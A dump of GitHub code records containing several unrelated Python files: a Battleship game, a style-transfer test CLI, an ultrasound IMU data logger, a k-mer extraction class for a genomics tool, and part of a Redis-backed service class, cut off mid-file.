= train_data.class_to_idx\n model_classifier = {'epoch': args.epochs,\n 'model_arch': args.arch,\n 'learning_rate': learning_rate,\n 'input_size': input_size,\n 'output_size': output_size,\n 'hidden_layers': hidden_layers,\n 'drop_p': args.drop_p,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'class_to_idx': model.class_to_idx}\n torch.save(model_classifier, chkpt_dir)\n\n print('Training complete.')\n print('Model checkpoint saved location: ', chkpt_dir)\n","repo_name":"kennybcuz/image_classifier_project","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30202016033","text":"'''\nCreated on Apr 19, 2020\n\n@author: Timothy\n'''\nfrom random import randint\nimport enum\n\n\n\n\n\n\n \n\ndef printBoard(board):\n print(\" 1 2 3 4 5 6 7 8\")\n print(\"\")\n num = 1\n for row in board:\n print(str(num) + \" \" + (\" \").join(row))\n num += 1\n print(\"\")\ndef setShips(board, ships):\n for ship in ships:\n print(\"Adding ship\")\n setShip(board, ship)\n print(\"Ship added\")\n \ndef setShip(board, shiplength):\n ##while True:\n while True:\n orientation = randint(0, 2)\n if orientation == 0:\n ##horizontal\n starting = randint(0, len(board[0]) - shiplength)\n starting2 = starting\n shiplength2 = shiplength\n row = randint(0, len(board) - 1)\n valid = True\n while shiplength2 > 0:\n if board[row][starting2] != \"0\":\n valid = False\n break\n starting2 += 1\n shiplength2 -= 1\n if not valid:\n continue\n while shiplength > 0:\n board[row][starting] = \"S\"\n starting += 1\n shiplength -= 1\n else:\n ##vertical\n starting = randint(0, len(board) - shiplength)\n starting2 = starting\n shiplength2 = shiplength\n col = randint(0, len(board[0]) - 1)\n valid2 = True\n while shiplength2 > 0:\n if board[starting2][col] != \"0\":\n valid2 = False\n break\n starting2 += 1\n shiplength2 -= 1\n if not valid2:\n continue\n while shiplength > 0:\n board[starting][col] = \"S\"\n starting += 1\n shiplength -= 1\n break\n \ndef myGuess(pcboard, myhitsboard):\n valid = False\n while not valid:\n while True:\n \n try:\n guessRow = int(input(\"Which row?\\n\"))\n if guessRow < 1 or guessRow > len(pcboard):\n print(\"That is an invalid row\")\n continue\n except ValueError:\n print(\"That is an invalid row\")\n continue\n \n break\n \n while True:\n try:\n guessCol = int(input(\"Which column?\\n\"))\n \n if guessCol < 1 or guessCol > len(pcboard[0]):\n print(\"That is an invalid column\")\n continue\n except ValueError:\n print(\"That is an invalid row\")\n continue\n break\n guessRow = guessRow - 1\n guessCol = guessCol - 1\n if myhitsboard[guessRow][guessCol] == \"0\":\n if pcboard[guessRow][guessCol] == \"S\":\n myhitsboard[guessRow][guessCol] = \"H\"\n print(\"You hit a ship!\")\n \n else:\n myhitsboard[guessRow][guessCol] = \"X\"\n print(\"You missed\")\n valid = True\n \n else:\n print(\"You already guessed that location. Try again.\")\n \ndef pcGuess(myboard, pchitsboard):\n print(\"The computer is choosing...\")\n valid = False\n \n while not valid:\n \n location = pcCheckHit(pchitsboard)\n \n if location == None:\n pcGuessRow = randint(0, len(myboard) - 1)\n pcGuessCol = randint(0, len(myboard[0]) - 1)\n print(\"The computer is choosing a random location\")\n \n else:\n pcGuessRow = location[0]\n pcGuessCol = location[1]\n print(\"The computer is choosing near a hit\")\n \n print(\"The computer chose row \" + str((pcGuessRow + 1)) + \" and column \" + str((pcGuessCol + 1)))\n if pchitsboard[pcGuessRow][pcGuessCol] == \"0\":\n if myboard[pcGuessRow][pcGuessCol] == \"S\":\n print(\"Your battleship got hit\")\n pchitsboard[pcGuessRow][pcGuessCol] = \"H\"\n \n else:\n print(\"Your battleship was not hit\")\n pchitsboard[pcGuessRow][pcGuessCol] = \"X\"\n valid = True\n \ndef guess(myboard, pchitsboard, row, col):\n\n if pchitsboard[row][col] == \"0\":\n if myboard[row][col] == \"S\":\n print(\"Your battleship got hit\")\n pchitsboard[row][col] = \"H\"\n \n else:\n print(\"Your battleship was not hit\")\n pchitsboard[row][col] = \"X\"\n \ndef pcCheckHit(pchitsboard):\n row = 0\n col = 0\n while row < len(pchitsboard):\n col = 0\n while col < len(pchitsboard[0]):\n if pchitsboard[row][col] == \"H\":\n x = pcAroundHit(row, col, pchitsboard)\n if x != None:\n return x\n col += 1\n row += 1\n return None\n \n\ndef pcAroundHit(row, col, pchitsboard):\n \n if row + 1 < len(pchitsboard):\n if pchitsboard[row + 1][col] == \"0\":\n return [row + 1, col]\n if row - 1 >= 0:\n if pchitsboard[row - 1][col] == \"0\":\n return [row - 1, col]\n if col + 1 < len(pchitsboard[0]):\n if pchitsboard[row][col + 1] == \"0\":\n return [row, col + 1]\n if col - 1 >= 0:\n if pchitsboard[row][col - 1] == \"0\":\n return [row, col - 1]\n else:\n return None\n \ndef testWin(pcboard, myhitsboard):\n row = 0\n col = 0\n \n while row < len(pcboard):\n col = 0\n while col < len(pcboard[0]):\n if pcboard[row][col] != \"0\":\n if myhitsboard[row][col] == \"0\":\n return False\n col += 1\n row += 1\n return True \n \nclass Strategy():\n RANDOM = 1\n \n HUNTTARGET = 2\n \n ##Checkered\n GRID1 = 3\n ##Diagonal\n GRID2 = 4\n \n\ndef checkered(myboard, pchitsboard, strategy):\n boardlength = len(pchitsboard)\n valid = False\n location = pcCheckHit(pchitsboard)\n if location == None:\n while not valid:\n col = randint(0, boardlength - 1)\n row = randint(0, boardlength - 1)\n if strategy == 3: \n if (row + col) % 2 == 0:\n if pchitsboard[row][col] == \"0\":\n valid = True\n if strategy == 4:\n if (row + col) % 2 == 1:\n if pchitsboard[row][col] == \"0\":\n valid = True\n guess(myboard, pchitsboard, row, col)\n else:\n while not valid:\n row = location[0]\n col = location[1]\n if pchitsboard[row][col] == \"0\":\n valid = True\n print(\"The computer is choosing near a hit\")\n guess(myboard, pchitsboard, row, col)\n \n \ndef random(myboard, pchitsboard):\n boardlength = len(pchitsboard)\n valid = False\n while not valid:\n row = randint(0, boardlength - 1)\n print(str(row))\n col = randint(0, boardlength - 1)\n print(str(col))\n if pchitsboard[row][col] == \"0\":\n valid = True\n guess(myboard, pchitsboard, row, col)\n \ndef main():\n ships = [5, 4, 3, 3, 2]\n print(\"Welcome to Battleship\")\n print(\"Choose a row and column you want to guess. Rows and columns start at 1, and there are 8 rows and 8 columns.\")\n print(\"X's indicate a miss, and H's indicate a hit.\")\n print(\"\")\n pcboard = []\n myboard = []\n myhitsboard = []\n pchitsboard = []\n for x in range(8):\n pcboard.append([\"0\"] * 8)\n myboard.append([\"0\"] * 8)\n myhitsboard.append([\"0\"] * 8)\n pchitsboard.append([\"0\"] * 8)\n \n strat = input(\"Which strategy do you want the AI to use?\\n[1: Random, 2: Hunt/Target 3: Grid]\\n\")\n if strat == \"3\":\n gridStrat = input(\"Which grid strategy do you want the AI to use?\\n[1: Checkered, 2: Checkered2]\\n\")\n strat = int(gridStrat) + 2\n strategy = int(strat)\n \n \n \n ##printBoard(pcboard)\n ##printBoard(myboard)\n \n setShips(pcboard, ships)\n setShips(myboard, ships)\n \n ##printBoard(pcboard)\n \n print(\"This is your board\")\n printBoard(myboard)\n \n \n print(\"This is your hits board\")\n printBoard(myhitsboard)\n \n while True:\n myGuess(pcboard, myhitsboard)\n if testWin(pcboard, myhitsboard):\n print(\"You won! You sunk their battleship\")\n break\n if strategy == 1:\n random(myboard, pchitsboard)\n if strategy == 2:\n pcGuess(myboard, pchitsboard)\n if strategy == 3:\n checkered(myboard, pchitsboard, 3)\n if strategy == 4:\n checkered(myboard, pchitsboard, 4)\n if testWin(myboard, pchitsboard):\n print(\"You lost. Your battleship was sunken\")\n break\n print(\"\")\n print(\"PC's Hits:\")\n printBoard(pchitsboard)\n print(\"\\n\")\n print(\"Your Hits:\")\n printBoard(myhitsboard)\n print(\"\\n\")\n\n\n\n\n\n\n\n\nmain()","repo_name":"TimothySung1/MiniProjects","sub_path":"Battleship/Battleship.py","file_name":"Battleship.py","file_ext":"py","file_size_in_byte":9135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25688432755","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 21 21:29:40 2018\n\n@author: zwx\n\"\"\"\n\nfrom argparse import ArgumentParser\nfrom model import WCT_test_all_layer\n\n\nparser = ArgumentParser()\n\n\n \nparser.add_argument('--pretrained_vgg',type=str,\n dest='pretrained_vgg',help='the pretrained vgg19 path',\n metavar='Pretrained',required = True)\nparser.add_argument('--content_path',type=str,\n dest='content_path',help='the content path',\n metavar='Content',required = True)\n\nparser.add_argument('--style_path',type=str,\n dest='style_path',help='style path',\n metavar='Style',required = True)\n \nparser.add_argument('--output_path',type=str,\n dest='output_path',help='output_path',\n metavar='Output',required = True)\n \nparser.add_argument('--alpha',type=float,\n dest='alpha',help='the blended weight',\n metavar='ALpha',required = True)\n\ndef main():\n opts = parser.parse_args()\n \n model = WCT_test_all_layer(\n pretrained_vgg = opts.pretrained_vgg,\n content_path = opts.content_path,\n style_path = opts.style_path,\n output_path = opts.output_path,\n alpha = opts.alpha,\n )\n model.test()\n \nif __name__ == '__main__' :\n main()","repo_name":"zhangcliff/WCT-based-style-transfer","sub_path":"test_all_layer.py","file_name":"test_all_layer.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"35"} +{"seq_id":"37396805791","text":"#!/usr/bin/env python\n\nimport argparse\nimport os.path\nimport pylisten\nfrom PIL import Image\nimport sys\nimport numpy as np\nimport pandas as pd\n\nstart = 0.0 \nflag = 0\nprevious_time = 1e-10\n## called when a new processed image is streamed\n# @param image the scan-converted image data\n# @param width width of the image in pixels\n# @param height height of the image in pixels\n# @param bpp bits per pixel\n# @param micronsPerPixel microns per pixel\n# @param timestamp the image timestamp in nanoseconds\n\ndef imu_data_processing(imu,imu_len):\n\n imu_data = np.empty(14, dtype=float)\n for i in imu:\n # print(i.ax, i.ay, i.az, i.gx, i.gy, i.gz, i.mx, i.my, i.mz, i.qw, i.qx, i.qy, i.qz)\n imu_data[0] += i.ax\n imu_data[1] += i.ay\n imu_data[2] += i.az\n imu_data[3] += i.gx\n imu_data[4] += i.gy\n imu_data[5] += i.gz\n imu_data[6] += i.mx\n imu_data[7] += i.my\n imu_data[8] += i.mz\n imu_data[9] += i.qw\n imu_data[10] += i.qx\n imu_data[11] += i.qy\n imu_data[12] += i.qz\n imu_data[13] += (i.tm/1e+9)\n\n \n imu_data = (imu_data/imu_len) \n\n # print(imu_data)\n return imu_data\n\ndef write_to_csv(imu,time_frame,previous_time):\n global flag\n path = \"/home/amalik/Documents/listener/src/python/IMU_data/imu_data.csv\"\n\n frame_data = pd.DataFrame({'acc_x': [imu[0]],'acc_y': [imu[1]],'acc_z': [imu[2]],\n 'gyro_x': [imu[3]],'gyro_y': [imu[4]],'gyro_z': [imu[5]],\n 'mag_x': [imu[6]],'mag_y': [imu[7]],'mag_z': [imu[8]],\n 'quaternion_w': [imu[9]],'quaternion_x': [imu[10]],'quaternion_y': [imu[11]],'quaternion_z': [imu[12]],\n 'rate':[(1/(time_frame-previous_time))],'time':[time_frame]})\n \n # print(imu)\n \n if(not flag):\n frame_data.to_csv(path, mode='a', index=False, header=True)\n flag = 1 \n else:\n frame_data.to_csv(path, mode='a', index=False, header=False)\n \n\n\ndef newProcessedImage(image, width, height, bpp, micronsPerPixel, timestamp, imu):\n print(\"new image (sc): {0}, {1}x{2} @ {3} bpp, {4:.2f} um/px, imu: {5} pts\".format(timestamp, width, height, bpp, micronsPerPixel, len(imu)))\n global start\n global positional_data\n global previous_time\n \n if(start == 0.0):\n start = np.round_((timestamp/1e+9), decimals = 3)\n\n # img = Image.frombytes('L', (width, height), image)\n if bpp == 32:\n img = Image.frombytes('RGBA', (width, height), image)\n else:\n img = Image.frombytes('L', (width, height), image)\n\n time_frame = abs(np.round_((timestamp/1e+9 - start), decimals = 3))\n \n # /********************************************\n # for raw imu data:\n imu_data = imu_data_processing(imu, len(imu))\n \n write_to_csv(imu_data,time_frame,previous_time)\n \n # ********************************************/\n previous_time = time_frame\n # /********************************************\n # for positional data:\n # position_data = positional_data_processing(imu_data)\n # write_to_csv(position_data,time_frame)\n # ********************************************/\n \n path_img = \"/home/amalik/Documents/listener/src/python/slice_data/\" + f\"{time_frame}.png\"\n img.save(path_img)\n\n return\n\n\n## called when a new raw image is streamed\n# @param image the raw pre scan-converted image data, uncompressed 8-bit or jpeg compressed\n# @param lines number of lines in the data\n# @param samples number of samples in the data\n# @param bps bits per sample\n# @param axial microns per sample\n# @param lateral microns per line\n# @param timestamp the image timestamp in nanoseconds\n# @param jpg jpeg compression size if the data is in jpeg format\ndef newRawImage(image, lines, samples, bps, axial, lateral, timestamp, jpg):\n print(\"new image (ps): {0}, {1}x{2} @ {3} bps, {4:.2f} um/s, {5:.2f} um/l\".format(timestamp, lines, samples, bps, axial, lateral))\n if jpg == 0:\n img = Image.frombytes('L', (samples, lines), image, \"raw\")\n else:\n # note! this probably won't work unless a proper decoder is written\n img = Image.frombytes('L', (samples, lines), image, \"jpg\")\n img.save(\"raw_image.jpg\")\n return\n\n## called when freeze state changes\n# @param frozen the freeze state\ndef freezeFn(frozen):\n if frozen:\n print(\"imaging frozen\")\n else:\n print(\"imaging running\")\n return\n\n## called when a button is pressed\n# @param button the button that was pressed\n# @param clicks number of clicks performed\ndef buttonsFn(button, clicks):\n print(\"button pressed: {0}, clicks: {1}\".format(button, clicks))\n return\n\n## main function\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--address', '-a', dest='ip', help='ip address of probe.', required=True)\n parser.add_argument('--port', '-p', dest='port', type=int, help='port of the probe', required=True)\n parser.add_argument('--width', '-w', dest='width', type=int, help='image output width in pixels')\n parser.add_argument('--height', '-ht', dest='height', type=int, help='image output height in pixels')\n parser.set_defaults(ip=None)\n parser.set_defaults(port=None)\n parser.set_defaults(width=640)\n parser.set_defaults(height=480)\n args = parser.parse_args()\n\n # uncomment to get documentation for pylisten module\n # print(help(pylisten))\n if not args.ip or not args.port or args.port < 0:\n print(\"one or more arguments are invalid\")\n parser.print_usage()\n return\n \n # get home path\n path = os.path.expanduser(\"~/\")\n\n # initialize\n listen = pylisten.Listener(newProcessedImage, newRawImage, freezeFn, buttonsFn)\n ret = listen.init(path, args.width, args.height)\n if ret:\n print(\"initialization succeeded\")\n ret = listen.connect(args.ip, args.port)\n if ret:\n print(\"connected to {0} on port {1}\".format(args.ip, args.port))\n else:\n print(\"connection failed\")\n listen.destroy()\n return\n else:\n print(\"initialization failed\")\n return\n \n # input loop\n key = ''\n while key != 'q' and key != 'Q':\n key = input(\"press ('q' to quit) ('a' for action): \")\n if key == 'a' or key == 'A':\n key = input(\"(f)->freeze, (i)->image, (c)->cine, (d/D)->depth, (g/G)->gain: \")\n if key == 'f' or key == 'F':\n listen.userFunction(1)\n elif key == 'i' or key == 'I':\n listen.userFunction(2)\n elif key == 'c' or key == 'C':\n listen.userFunction(3)\n elif key == 'd':\n listen.userFunction(4)\n elif key == 'D':\n listen.userFunction(5)\n elif key == 'g':\n listen.userFunction(6)\n elif key == 'G':\n listen.userFunction(7)\n\n listen.destroy()\n\nif __name__ == '__main__':\n main()\n","repo_name":"amalik3099/MQP-Ultrasound-Needle-Guidance","sub_path":"src/python/data_aquisition_pipeline.py","file_name":"data_aquisition_pipeline.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"34003631754","text":"import os\nimport ray\nimport gzip\nimport warnings\n\nimport numpy as np\nimport pandas as pd\n\nfrom Bio import SeqIO\nfrom glob import glob\nfrom shutil import rmtree\nfrom os.path import splitext\n\n# Kmers extraction\nfrom data.extraction.seen_kmers_vectorizer import SeenKmersVectorizer\nfrom data.extraction.given_kmers_vectorizer import GivenKmersVectorizer\n\n# Features selection\nfrom data.reduction.chi2_selection import TensorChi2Selection\nfrom data.reduction.occurence_exclusion import TensorPercentOccurenceExclusion\n\n__author__ = ['Amine Remita', 'Nicolas de Montigny']\n\n__all__ = ['KmersCollection']\n\n\"\"\"\nModule inspired from module kmer_collections.py of\nmlr_kgenomvir package [Remita et al. 2022]\n\nLoad sequences to pandas dataframe by batch then saved to parquet files.\nRead parquet files into a unified ray dataset, before tokenizing kmers from sequence into count matrix and concatenating into a tensor.\nUsing Ray datasets for I/O and to scale cluster to available computing ressources.\n\"\"\"\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nwarnings.filterwarnings(\"ignore\")\n\nclass KmersCollection():\n \"\"\"\n ----------\n Attributes\n ----------\n\n k : int\n The length of K-mers extracted\n\n dataset : string\n Name of the dataset from which the K-mers profiles were extracted\n\n Xy_file : string\n Path to a folder containing the Ray Dataset of K-mers abundance profiles\n The folder contains a number of files in Apache parquet format\n The number of files is equivalent to the number of blocks in the dataset\n\n fasta : string\n A fasta file containing all sequences from which K-mers were extracted\n\n csv : string\n A csv file containing all classes in the database associated to each ID\n\n df : ray.data.Dataset\n A Ray dataset containing the K-mers abundance profiles of each sequences\n\n ids : list\n A list of all sequences ids\n\n taxas : list of strings\n A list containing the taxas contained in the dataset if they were present\n Returns None if no taxas were present in the dataset\n\n classes : list of strings\n A list containing the classes contained in the dataset if they were present\n It must be paired to the attribute 'taxas' to be used\n Returns None if no classes were present in the dataset\n\n method : string\n Method used to extract K-mers :\n 'given' if a K-mers list was passed in parameters\n 'seen' if no K-mers list was passed in parameters\n\n kmers_list : list of strings\n List of given K-mers if one was passed in parameters\n List of K-mers extracted if none was passed in parameters\n \"\"\"\n def __init__(\n self,\n fasta_file,\n Xy_file,\n k,\n cls_file = None,\n kmers_list = None,\n ):\n ## Public attributes\n # Parameters\n self.k = k\n self.Xy_file = Xy_file\n self.fasta = fasta_file\n self.csv = cls_file\n # Initialize variables\n self.df = None\n self.ids = []\n self.taxas = []\n self.method = None\n self.kmers_list = None\n self._nb_kmers = 0\n self._labels = None\n self._files_list = []\n self.memory_parsing = False\n \n # Infer method from presence of already extracted kmers or not\n if isinstance(kmers_list, list):\n self.method = 'given'\n self.kmers_list = kmers_list\n self._nb_kmers = len(self.kmers_list)\n else:\n self.method = 'seen'\n \n # Global tmp dir path\n self._tmp_dir = os.path.join(os.path.split(Xy_file)[0],\"tmp\",\"\")\n # Make global tmp dir if it doesn't exist\n if not os.path.isdir(self._tmp_dir):\n os.mkdir(self._tmp_dir)\n\n # Read classes files if present\n if self.csv is not None:\n self._read_cls_file()\n\n def _read_cls_file(self):\n self._labels = pd.read_csv(self.csv)\n # Get taxas from csv file\n if len(self._labels.columns) > 0:\n self.taxas = list(self._labels.columns)\n self.taxas.remove('id')\n else:\n raise ValueError(f'No information found in the classes csv file : {self.csv}')\n\n # Execute k-mers extraction\n def compute_kmers(self):\n print('compute_kmers')\n self._verif_mem_vs_disk()\n self._parse_fasta()\n self._make_ray_ds()\n self._kmers_tokenization()\n self._write_dataset()\n\n def _verif_mem_vs_disk(self):\n mem = ray.cluster_resources()['memory']\n fasta_size = os.path.getsize(os.path.expanduser(self.fasta))\n if mem > fasta_size:\n self.memory_parsing = True\n\n def _parse_fasta(self):\n print('_parse_fasta')\n if os.path.isfile(self.fasta):\n if self.memory_parsing:\n self._single_fasta_ds_mem()\n else:\n self._single_fasta_ds_disk()\n elif os.path.isdir(self.fasta):\n if self.memory_parsing:\n self._multi_fasta_ds_mem()\n else:\n self.fasta = glob(os.path.join(self.fasta, '*.fa'))\n self._multi_fasta_ds_disk()\n else:\n raise ValueError('Fasta must be an interleaved fasta file or a directory containing fasta files.')\n \n def _single_fasta_ds_mem(self):\n print('_single_fasta_ds_mem')\n data = {\n 'id':[],\n 'sequence':[]\n }\n path, ext = splitext(self.fasta)\n ext = ext.lstrip(\".\")\n if ext in [\"fa\",\"fna\",\"fasta\"]:\n with open(self.fasta, 'rt') as handle:\n for i, record in enumerate(SeqIO.parse(handle, 'fasta')):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n elif ext == \"gz\":\n with gzip.open(self.fasta, 'rt') as handle:\n for i, record in enumerate(SeqIO.parse(handle, 'fasta')):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n else:\n raise ValueError(f'Unknown file extension : {ext}')\n \n self.ids = data['id']\n self.df = pd.DataFrame(data)\n if self._labels is not None:\n self.df = pd.merge(self.df, self._labels, on = 'id', how = 'left')\n\n def _single_fasta_ds_disk(self):\n print('_single_fasta_ds_disk')\n data = {\n 'id':[],\n 'sequence':[]\n }\n path, ext = splitext(self.fasta)\n ext = ext.lstrip(\".\")\n if ext in [\"fa\",\"fna\",\"fasta\"]:\n with open(self.fasta, 'rt') as handle:\n for i, record in enumerate(SeqIO.parse(handle, 'fasta')):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n if i % 100 == 0 :\n df = pd.DataFrame(data)\n if self._labels is not None:\n cls = self._labels[self._labels['id'].isin(data['id'])]\n df = pd.merge(df, cls, on = 'id', how = 'left')\n df.to_parquet(os.path.join(self._tmp_dir, f'batch_{int(i/100)}.parquet'))\n self.ids.extend(data['id'])\n data = {\n 'id':[],\n 'sequence':[]\n }\n if len(data['id']) != 0:\n df = pd.DataFrame(data)\n if self._labels is not None:\n cls = self._labels[self._labels['id'].isin(data['id'])]\n df = pd.merge(df, cls, on = 'id', how = 'left')\n df.to_parquet(os.path.join(self._tmp_dir, f'batch_end.parquet'))\n self.ids.extend(data['id'])\n elif ext == \"gz\":\n with gzip.open(self.fasta, 'rt') as handle:\n for i, record in enumerate(SeqIO.parse(handle, 'fasta')):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n if i % 100 == 0 :\n df = pd.DataFrame(data)\n if self._labels is not None:\n cls = self._labels[self._labels['id'].isin(data['id'])]\n df = pd.merge(df, cls, on = 'id', how = 'left')\n df.to_parquet(os.path.join(self._tmp_dir, f'batch_{int(i/100)}.parquet'))\n self.ids.extend(data['id'])\n data = {\n 'id':[],\n 'sequence':[]\n }\n if len(data['id']) != 0:\n df = pd.DataFrame(data)\n if self._labels is not None:\n cls = self._labels[self._labels['id'].isin(data['id'])]\n df = pd.merge(df, cls, on = 'id', how = 'left')\n df.to_parquet(os.path.join(self._tmp_dir, f'batch_end.parquet'))\n self.ids.extend(data['id'])\n else:\n raise ValueError(f'Unknown file extension : {ext}')\n\n def _multi_fasta_ds_mem(self):\n print('_multi_fasta_ds_mem')\n data = {\n 'id':[],\n 'sequence':[]\n }\n for i, file in enumerate(self.fasta):\n path, ext = splitext(file)\n ext = ext.lstrip(\".\")\n if ext in [\"fa\",\"fna\",\"fasta\"]:\n with open(file, 'rt') as handle:\n for record in SeqIO.parse(handle, 'fasta'):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n elif ext == \"gz\":\n with gzip.open(file, 'rt') as handle:\n for record in SeqIO.parse(handle, 'fasta'):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n else:\n raise ValueError(f'Unknown file extension : {ext}')\n \n self.ids = data['id']\n self.df = pd.DataFrame(data)\n if self._labels is not None:\n self.df = pd.merge(self.df, self._labels, on = 'id', how = 'left')\n \n def _multi_fasta_ds_disk(self):\n print('_multi_fasta_ds_disk')\n data = {\n 'id':[],\n 'sequence':[]\n }\n for i, file in enumerate(self.fasta):\n path, ext = splitext(file)\n ext = ext.lstrip(\".\")\n if ext in [\"fa\",\"fna\",\"fasta\"]:\n with open(file, 'rt') as handle:\n for record in SeqIO.parse(handle, 'fasta'):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n elif ext == \"gz\":\n with gzip.open(file, 'rt') as handle:\n for record in SeqIO.parse(handle, 'fasta'):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n else:\n raise ValueError(f'Unknown file extension : {ext}')\n if i % 100 == 0 :\n df = pd.DataFrame(data)\n if self._labels is not None:\n cls = self._labels[self._labels['id'].isin(data['id'])]\n df = pd.merge(df, cls, on = 'id', how = 'left')\n df.to_parquet(os.path.join(self._tmp_dir, f'batch_{int(i/100)}.parquet'))\n self.ids.extend(data['id'])\n data = {\n 'id':[],\n 'sequence':[]\n }\n if len(data['id']) != 0:\n df = pd.DataFrame(data)\n if self._labels is not None:\n cls = self._labels[self._labels['id'].isin(data['id'])]\n df = pd.merge(df, cls, on = 'id', how = 'left')\n df.to_parquet(os.path.join(self._tmp_dir, f'batch_end.parquet'))\n self.ids.extend(data['id'])\n\n def _make_ray_ds(self):\n print('_make_ray_ds')\n if self.memory_parsing:\n self.df = ray.data.from_pandas(self.df)\n if self.df.count() > 10:\n self.df = self.df.repartition(int(self.df.count()/10))\n else:\n self._files_list = glob(os.path.join(self._tmp_dir, '*.parquet'))\n self.df = ray.data.read_parquet_bulk(self._files_list, parallelism = len(self._files_list))\n\n def _kmers_tokenization(self):\n print('_kmers_tokenization')\n if self.method == 'seen':\n tokenizer = SeenKmersVectorizer(\n k = self.k,\n column = 'sequence'\n )\n elif self.method == 'given':\n tokenizer = GivenKmersVectorizer(\n k = self.k,\n column = 'sequence',\n tokens = self.kmers_list\n )\n tokenizer.fit(self.df)\n self.df = tokenizer.transform(self.df)\n if self.method == 'seen':\n self.kmers_list = tokenizer.stats_['tokens(sequence)']\n self._kmers_reduction()\n\n def _kmers_reduction(self):\n # Exclusion of columns occuring in less 5% / more 95% of the samples\n excluder = TensorPercentOccurenceExclusion(\n features = self.kmers_list,\n percent = 0.05\n )\n self.df = excluder.fit_transform(self.df)\n \n self.kmers_list = excluder.stats_['cols_keep']\n\n # Chi2 evaluation of dependance between features and classes\n selector = TensorChi2Selection(\n features = self.kmers_list,\n threshold = 0.05\n )\n self.df = selector.fit_transform(self.df)\n \n self.kmers_list = selector.stats_['cols_keep']\n\n def _write_dataset(self):\n self.df.write_parquet(self.Xy_file)\n rmtree(self._tmp_dir)\n","repo_name":"bioinfoUQAM/Caribou","sub_path":"src/data/kmers.py","file_name":"kmers.py","file_ext":"py","file_size_in_byte":13984,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"18394094250","text":"from exceptions import ValueError\n\nfrom tinyrpc.dispatch import public\nfrom redis import Redis\nimport json\nfrom tinyrpc.exc import RPCError\n\nfrom cid.utils.fileUtils import loadJSONFromFile\nfrom cid.utils.helpers import DatetimeEncoder, DatetimeDecoder\nfrom cid.core.pubsub import PubSub\n\nfrom cid.core.login import LoginManager\nfrom .utils import CaliopeEntityUtil\nfrom .models import VersionedNode, CaliopeTransaction\n\nfrom cid.core.access_control import AccessControlManager\n\n\nclass CaliopeServices(object):\n \"\"\"\n\n This class is the base for all future forms elements.\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n cls.r = Redis()\n cls.service_class = kwargs[\"service_class\"] if \"service_class\" in \\\n kwargs else VersionedNode\n cls.draft_hkey = cls.service_class.__name__ + \"_drafts\"\n\n return cls\n\n def __init__(self, *args, **kwargs):\n super(CaliopeServices, self).__init__(*args, **kwargs)\n\n @classmethod\n @public(\"getAll\")\n def get_all(cls, *args, **kwargs):\n return cls.service_class.category().instance.all()\n\n @classmethod\n @public(\"getModel\")\n def get_empty_model(cls, entity_class=None, template_html=None,\n template_layout=None, actions=None, data=False):\n \"\"\"\n This method needs to be override if you want to use configured json\n forms.\n\n This methods creates an empty `py::class CaliopeEntityController` and\n returns the model and empty data. The model is returned based on the\n template, or creates a default template if `py::cons None`.\n\n At the ends, append generated draft uuid to Redis\n\n :param\n \"\"\"\n entity_controller = CaliopeEntityController(entity_class=entity_class,\n template_html=template_html,\n template_layout=template_layout,\n actions=actions)\n rv = entity_controller.get_model()\n if data:\n rv[\"data\"] = entity_controller.get_data()\n cls.set_drafts_uuid(rv['data']['uuid']['value'], entity_class)\n return rv\n\n @PendingDeprecationWarning\n @classmethod\n @public(\"getModelAndData\")\n def get_model_and_data(cls, uuid, entity_class=None, template_html=None, template_layout=None, actions=None):\n entity_controller = CaliopeEntityController(entity_class=entity_class,\n template_html=template_html,\n template_layout=template_layout,\n actions=actions)\n rv = entity_controller.get_model()\n rv[\"data\"] = entity_controller.get_data()\n cls.subscribe_uuid(uuid)\n return rv\n\n @classmethod\n def subscribe_uuid(cls, uuid):\n PubSub().subscribe_uuid(uuid)\n\n @classmethod\n def unsubscribe_uuid(cls, uuid):\n PubSub().unsubscribe_uuid(uuid)\n\n @classmethod\n def set_drafts_uuid(cls, uuid, entity_class):\n \"\"\"\n This methods check and creates the HSET in Redis with the key\n cls.draft_hkey where valid uuids are stored.\n \"\"\"\n\n if cls.r.hexists(cls.draft_hkey, uuid):\n raise KeyError(\"UUID {} already is a draft\".format(uuid))\n else:\n cls.r.hset(cls.draft_hkey, uuid, \"__draft__\")\n\n if entity_class is None:\n entity_class = VersionedNode\n if not cls.r.hexists(uuid + \"_class\", \"name\"):\n cls.r.hset(uuid + \"_class\", \"name\", entity_class.__name__)\n\n @classmethod\n def _set_related(cls, uuid, target_uuid, **kwargs):\n cls.r.hset(uuid + \"_related\", target_uuid, kwargs)\n\n @classmethod\n def _get_related(cls, uuid):\n return cls.r.hgetall(uuid + \"_related\")\n\n @classmethod\n def _del_related(cls, uuid, target_uuid):\n if cls.r.hexists(uuid + \"_related\", target_uuid):\n return cls.r.hdel(uuid + \"_related\", target_uuid)\n\n @classmethod\n def _is_related(cls, uuid, target_uuid):\n return cls.r.hexists(uuid + \"_related\", target_uuid)\n\n @classmethod\n def is_draft_not_commited(cls, uuid):\n if cls.r.hexists(cls.draft_hkey, uuid):\n return True\n return False\n\n @classmethod\n def _has_draft_props(cls, 